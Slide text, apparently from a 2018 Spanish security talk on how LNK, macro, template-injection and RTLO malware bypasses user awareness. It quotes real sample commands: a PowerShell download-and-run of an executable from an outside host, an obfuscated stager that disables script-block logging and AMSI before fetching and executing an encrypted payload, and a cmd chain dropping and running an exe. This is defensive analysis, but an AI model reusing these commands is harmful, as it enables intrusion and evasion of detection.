Navajas Negras 2018

1. -BYPASSING THE USER SKILL-
MANUEL BERMÚDEZ CASADO

2. • Manuel Bermúdez Casado
YO

3. ¿DE QUÉ VA ESTO?
• En las empresas cada vez gastamos mas dinero en Concienciar a los usuarios.
• El malware cada vez es mas ingenioso y buscan técnicas par desviar la
atención de los usuarios.
• Cada vez hay menos malware en ficheros ejecutables “.exe”.
• La ingeniería social sigue siendo el mayor vector de ataques a las empresas.
• El usuario sigue siendo el eslabón mas débil de la ciberseguridad en las empresas.

4. ¿EL ENGAÑO?

5. CON LOS HACKERS NO FUNCIONA
Con los hackers funciona Tetas, Gatitos y Chema, no necesariamente en ese orden.

6. ¿QUÉ VAMOS A VER?
• Ejemplos:
• 9ae013ae0cf7c758c9d4b70fe998c65d LNK powershell descarga de fichero
• 19d9760572b36caa2055390395848ca3 LNK Powershell descarga fichero
• 0f28aaaa78ec7fd7360a902f70c5da60 LNK CMD
• 3466eb3495a1618e7c37cf1e553d71a2 XlS con Macros.
• A42687f1e0bcf49c2172b975e68b63f7 Doc con Macros
• 3c432a21cfd05f976af8c47a007928f7 Doc Template injection

7. LNK POWERSHELL I DESCARGA FICHERO II
9ae013ae0cf7c758c9d4b70fe998c65d
%WINDIR%System32WindowsPowerShellv1.0powershell.exe $cmd = 'Start-Process';$b = '%TEMP%sys'+'t.e'+'xe'; $a = New-
Object System.Net.WebClient; $a.DownloadFile('http://hecforex.info/wp-includes/upd.exe','%TEMP%sys'+'t.e'+'xe'); &($cmd) -FilePath
$b;

8. LNK POWERSHELL I DESCARGA DE FICHERO
9ae013ae0cf7c758c9d4b70fe998c65d
Baja detección en de los Antivirus

9. LNK POWERSHELL II
19d9760572b36caa2055390395848ca3
powershell -noP -sta -w 1 -enc
SQBGACgAJABQAFMAVgBFAFIAcw……………………………..AFYAaQBjAEUAUABPAEkATgBUAE0AQQBuAEEAZwBlAFIAXQA6ADoARQB4AHAARQBjAHQAMQAwADAAQwBvAG4AdABJAGAEoATwBJAG4AWwBDAGgAQQB
SAFsAXQBdACgAJgAgACQAUgAgACQARABBAFQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA3
IF($PSVERsIOnTablE.PSVErsion.MAjOR -ge
3){$GPF=[Ref].ASSEMBlY.GeTTyPE('System.Management.Automation.Utils')."GETFiE`LD"('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF){$GPC=$GPF.GetVaLue($NulL);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'
+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAl=[CoLlectIOnS.GenerIC.DiCtIonaRY[STRInG,SyStEm.OBjecT]]::NEW();$VAL.ADd('EnableScriptB'+'lockL
ogging',0);$VAL.AdD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsPowerShellScriptB'+'lockLogging']=$VAl}Else{[ScRipTBlocK]."GETFIe`ld"('signatures','N'+'onP
ublic,Static').SEtVaLuE($NULL,(NEW-ObJeCT
COLLectioNS.GenERiC.HasHSET[stRING]))}[ReF].ASSEMBLy.GEtTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFIElD('amsiInitFailed','NonPublic,Static').SetVAlue($NuLL,$tRUe)};};[SYstem.NET.SeRVicEPOINTMAnA
geR]::ExpEct100ContInuE=0;$wc=New-OBjEcT SYstEM.NeT.WEbClIEnT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeaDerS.Add('User-
Agent',$u);$wc.PROxy=[SYstem.NET.WEbREqUESt]::DeFAulTWEBPROxY;$wC.PRoxY.CREdenTiaLs = [System.Net.CRedeNtIALCaCHe]::DEFaUlTNeTwOrKCreDENTiAlS;$Script:Proxy =
$wc.Proxy;$K=[SYStEM.TExT.EnCOdinG]::ASCII.GEtBYteS('ee7beb7cda0e26af79dc0d2ecb5d166f');$R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I
=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-
BxOR$S[($S[$I]+$S[$H])%256]}};$ser='http://10.16.2.176:80';$t='/admin/get.php';$Wc.HeaDeRs.ADD("Cookie","session=QDsxgCrIClPG6hPAj2tJAXiQw5U=");$DaTa=$WC.DOwNlOaDDAta($Ser+$T);$IV=$DaTA[0..3];$dA
Ta=$dAtA[4..$DATa.LENgTh];-JOIn[ChAR[]](& $R $DATa ($IV+$K))|IEX

10. LNK POWERSHELL II
19d9760572b36caa2055390395848ca3

11. LNK CMD
0f28aaaa78ec7fd7360a902f70c5da60
%windir%system32cmd.exe /V:ON /C @echo off&set "f=Voda_rozchinnik" &cd "%temp%"&for /f "tokens=*" %i in ('dir /b /AD /O-D') do if exist "%i!f!.lnk" more +1378 "%i!f!.lnk"
>81.js&&wscript.exe 81.js >"!f!.exe"&&start "" "!f!.exe"&&
C:WindowsSystem32cmd.exe
%windir%system32cmd.exe WScript.StdOut.Write("x4dx5a
x00x03x00x00x00x04x00x00x00
x00x00
x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00

12. LNK CMD
0f28aaaa78ec7fd7360a902f70c5da60

13. CLASICO XLS CON MACROS
• 3466eb3495a1618e7c37cf1e553d71a2

14. CLASICO XLS CON MACROS
• 3466eb3495a1618e7c37cf1e553d71a2

15. CLASICO DOC CON MACROS
• a42687f1e0bcf49c2172b975e68b63f7

16. CLASICO DOC CON MACROS
• a42687f1e0bcf49c2172b975e68b63f7

17. TEMPLATE INJECTION
• 3c432a21cfd05f976af8c47a007928f7

18. TEMPLATE INJECTION
• 3c432a21cfd05f976af8c47a007928f7

19. RTLO TÉCNICA
RIGHT TO LEFT OVERRIDE
RIGHT TO LEFT OVERRIDE

20. GRACIAS